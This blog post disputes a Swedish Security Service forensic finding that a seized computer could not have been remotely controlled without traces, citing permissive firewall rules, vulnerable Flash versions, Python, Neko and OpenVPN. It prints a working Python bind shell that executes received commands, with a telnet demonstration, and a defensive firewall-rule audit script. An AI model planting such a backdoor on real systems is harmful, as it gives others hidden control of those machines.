IT security specialists at the Swedish Security Service's Department of Information Security and Preservation of Evidence in IT Environments performed a forensic analysis of a computer seized from GSW (seizure 2012-0201-BG25023-26) and concluded that it would be impossible to remotely control it without leaving traces. The problem is that they are wrong. The investigation report is originally written in Swedish; my translated version can be downloaded here.
The forensic analysis was limited to the assumption that computers can only be remotely controlled via legitimate remote control services, such as Terminal Services and PowerShell. It focused on the services mentioned by the defendant and thereby bypassed the possibility that, just like Nordea's and Logica's computers, the seized computer might simply have been hacked without the defendant's knowledge, in the same way that Logica was hacked undetected for at least two years.
Yesterday, when Jacob Appelbaum was heard as an expert witness called by the defense, the author of the report admitted that not all contents of the seized computer's hard drive had been analyzed and that he is not a Windows expert.
The analysis assumes that only one firewall was present in the network: Windows Firewall, despite there being records of a "plastic cover belonging to router" being handed over to Swedish authorities by Cambodian authorities. The router's model, firmware version and settings are unknown, as the router itself has neither been documented nor analyzed. Apparently seizing the plastic cover was a higher priority.
In its investigation the Security Service shows that Adobe Flash Player versions 11.0r1, 11.2.d202, 11.3.r300, 11.3.r400 and 11.3.402 had full permission in the seized computer's Windows Firewall rules to communicate over both TCP and UDP on any port in any direction. These versions of Adobe Flash Player are affected by over 100 security issues, many of which can be exploited to execute code on the machine, so-called remote code execution vulnerabilities.
The computer’s Windows Firewall also allowed the Python interpreter to, just like all the other whitelisted applications, communicate over both TCP and UDP on any port and on any network device. Without going into further details in this post, here is a simple example of how a computer can be remotely controlled without leaving traces via Python:
import socket, subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind to port 9999 (example) on any network device
s.bind(("", 9999))
s.listen(1)
# Accept connections from clients
conn, addr = s.accept()
# Loop forever
while 1:
    # Read command sent from client
    data = conn.recv(1024)
    # Close link if no command is received
    if not data:
        break
    print("[+] Connection established")
    # Execute received command
    output = subprocess.check_output(data.decode().rstrip())
    # Send output of executed command back to the client
    conn.send("OUTPUT\n------\n".encode())
    conn.send(output)
conn.close()
When run, the script above creates a socket that listens on port 9999 and accepts connections on any network device on the computer. It then waits for a client to connect, reads the received commands, executes them and returns the command output to the client. It's not even complicated.
As an example this is what it looks like when a client connects to the server and lists the files in the current directory:
> telnet localhost 9999
Connected to localhost.
Escape character is '^]'.
ls
OUTPUT
------
server.py
In addition, the same scenario applies to another piece of software which was both installed and fully allowed in the local firewall: Neko.
Additionally, the computer had both the OpenVPN client and server software installed, enabling outsiders to connect to the computer and enabling the computer to join additional networks, forming a Virtual Private Network, which is a globally routed virtual LAN. Whether others connect directly to the computer or the computer is connected to an existing VPN, other clients in the same VPN can share local resources, such as hard drive storage, across the network.
Essentially it all boils down to this: it is up to the software that provides the remote control functionality to save logs to the hard drive. If the programmer doesn't explicitly write such logging functionality, as in the Python example given above, logs are simply not stored on the disk. Windows does not write every network-transmitted bit to disk, and unless someone logs their own backdooring it is not going to be detected through forensics. Nor is the Python example demonstrated above detected by antivirus software, as it performs completely normal network operations.
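As an added example, not from the original post or the Security Service's investigation, here is a small Python audit that parses a Windows Firewall rule listing and flags the pattern described above: enabled allow rules with no port restriction granted to programs that execute whatever is sent to them. The sample rule text is constructed, and the RISKY_PROGRAMS list is an assumption for this example.

```python
import re

# Constructed sample shaped like `netsh advfirewall firewall show rule name=all verbose`
# output; the rule names and program paths are made up for this example.
SAMPLE_RULES = """\
Rule Name:                            Python interpreter
----------------------------------------------------------------------
Enabled:                              Yes
Protocol:                             Any
Program:                              C:\\Python27\\python.exe
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Program:                              C:\\Windows\\system32\\svchost.exe
Action:                               Allow
"""

# Programs that execute arbitrary code handed to them over the network (assumed list).
RISKY_PROGRAMS = ("python", "flashplayer", "neko", "powershell")

def parse_rules(text):
    """Split netsh output into one {field: value} dict per rule."""
    rules = []
    for block in re.split(r"(?m)^Rule Name:", text)[1:]:
        lines = block.splitlines()
        fields = {"Rule Name": lines[0].strip()}
        for line in lines[1:]:
            key, sep, value = line.partition(":")  # first colon only, keeps "C:\..." intact
            if sep:
                fields[key.strip()] = value.strip()
        rules.append(fields)
    return rules

def is_overbroad(rule):
    """Enabled allow rule with no port restriction for a scriptable program."""
    if rule.get("Enabled") != "Yes" or rule.get("Action") != "Allow":
        return False
    any_port = rule.get("Protocol") == "Any" or rule.get("RemotePort", "Any") == "Any"
    return any_port and any(p in rule.get("Program", "").lower() for p in RISKY_PROGRAMS)

def find_overbroad_rules(text):
    """Names of rules that give a scriptable program unrestricted network access."""
    return [r["Rule Name"] for r in parse_rules(text) if is_overbroad(r)]
```

On a real host the text would come from running the netsh command and the hit list points at rules to tighten to specific ports or remove outright.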
You can obtain my somewhat lengthy comments on this matter here. Please keep in mind that they were written under somewhat stressed circumstances, where technical facts were prioritized over linguistic expression and spelling.
With more than 100 possibilities to remotely control the defendant’s computer without leaving traces, counting only those circumstances that paint the environmental picture in the Security Service’s investigation, it is absurd to claim that it would be impossible to remotely control the seized computer without leaving traces.
The authorities worked around the prerequisites of justice when they first seized a router's plastic cover instead of the router itself and later focused selectively on Windows Firewall. Analyzing the plastic cover would have had the same relevance as the investigation of remote control possibilities conducted by the Swedish Security Service.
Making the possible seem impossible is easy when the defendant's documents are locked in a secret cabinet and nobody has the ability to question you, but such actions do not promote the truth. It seems that the investigators were biased.